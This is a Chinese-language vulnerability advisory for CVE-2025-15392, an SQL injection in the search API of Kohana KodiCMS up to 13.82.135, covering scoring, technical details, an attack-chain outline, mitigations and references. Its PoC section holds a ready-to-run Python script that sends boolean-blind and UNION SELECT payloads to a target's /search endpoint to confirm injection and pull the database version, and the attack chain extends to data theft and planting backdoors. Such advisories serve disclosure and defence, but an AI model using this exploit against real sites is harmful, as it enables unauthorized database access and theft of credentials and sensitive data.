CVE-2025-15392 | Kohana KodiCMS Search API SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15392

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kohana KodiCMS

漏洞概述

CVE-2025-15392是Kohana KodiCMS中存在的一个SQL注入漏洞，存在于搜索API端点组件中。该漏洞影响KodiCMS版本直至13.82.135。问题根源在于cms/modules/pages/classes/kodicms/model/page.php文件中的like函数对keyword参数处理不当，未对用户输入进行充分的SQL语句转义或参数化处理。攻击者可通过构造恶意的keyword参数值，在SQL查询中注入任意SQL语句，从而实现数据库未授权访问、数据窃取或潜在的数据篡改。由于该漏洞可通过网络远程利用，且需要低权限认证即可发起攻击，因此具有较高的实际威胁性。漏洞利用代码已公开，厂商在收到安全通知后未做出任何回应。

技术细节

该SQL注入漏洞存在于Kohana KodiCMS的搜索功能模块中，具体位于cms/modules/pages/classes/kodicms/model/page.php文件的like函数。当用户通过Search API Endpoint提交搜索请求时，keyword参数被直接拼接到SQL查询语句的LIKE子句中，而未经过任何过滤或参数化处理。攻击者可通过在keyword参数中注入SQL语句，如使用单引号闭合原语句并添加UNION SELECT或布尔盲注等Payload，实现数据库敏感信息提取。漏洞利用条件宽松，只需低权限用户账号或通过API直接访问即可发起攻击。由于CVSS评分为6.3（AV:N/AC:L/PR:L/UI:N），攻击复杂度低且无需用户交互，远程攻击者可轻松利用此漏洞获取数据库内容，包括用户凭证、配置信息等敏感数据。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的Kohana KodiCMS版本，确认版本号低于或等于13.82.135

STEP 2

定位漏洞点

访问/search或相关搜索API端点，定位cms/modules/pages/classes/kodicms/model/page.php的like函数

STEP 3

构造Payload

在keyword参数中构造SQL注入Payload，如使用单引号闭合、UNION注入或布尔盲注技术

STEP 4

执行注入攻击

发送恶意请求，利用未过滤的输入参数执行注入的SQL语句，提取数据库敏感信息

STEP 5

数据窃取

通过多次注入查询，获取用户表、配置信息或其他敏感数据

STEP 6

权限提升或持久化

利用获取的信息进行进一步攻击，如获取管理员权限或植入后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15392 SQL Injection PoC for Kohana KodiCMS
# Target: Search API Endpoint in cms/modules/pages/classes/kodicms/model/page.php

def exploit_sql_injection(target_url, keyword):
    """
    Exploit SQL injection in KodiCMS Search API
    target_url: Base URL of KodiCMS installation
    keyword: SQL injection payload
    """
    endpoint = f"{target_url}/search"
    params = {'keyword': keyword}
    
    try:
        response = requests.get(endpoint, params=params, timeout=10)
        print(f"[*] Sending payload: {keyword}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

def test_blind_injection(target_url):
    """
    Test for boolean-based blind SQL injection
    """
    # True condition payload
    true_payload = "' OR '1'='1"
    # False condition payload
    false_payload = "' AND '1'='2"
    
    print("[*] Testing blind SQL injection...")
    true_resp = exploit_sql_injection(target_url, true_payload)
    false_resp = exploit_sql_injection(target_url, false_payload)
    
    if true_resp and false_resp and len(true_resp) != len(false_resp):
        print("[+] Blind SQL injection confirmed!")
        return True
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com/kodicms")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    # Basic test
    exploit_sql_injection(target, "test")
    
    # Blind injection test
    test_blind_injection(target)
    
    # Example: Extract database version
    version_payload = "' UNION SELECT NULL,@@version,NULL-- "
    print(f"\n[*] Extracting database version...")
    exploit_sql_injection(target, version_payload)

影响范围

Kohana KodiCMS <= 13.82.135

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1) 禁用或限制搜索API功能的访问；2) 在Web服务器层面配置URL过滤规则，拦截包含SQL注入特征字符（如单引号、UNION、SELECT等）的请求；3) 临时使用ModSecurity等WAF进行防护；4) 对数据库账户权限进行最小化配置，限制其对敏感表的查询权限。建议持续关注厂商公告，等待官方安全更新发布后立即升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15392
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15392
3 Details https://www.cvedetails.com/cve/CVE-2025-15392/
4 VulDB https://vuldb.com/cve/CVE-2025-15392
5 Link https://vuldb.com/?ctiid.339161
6 Link https://vuldb.com/?id.339161
7 Link https://vuldb.com/?submit.718289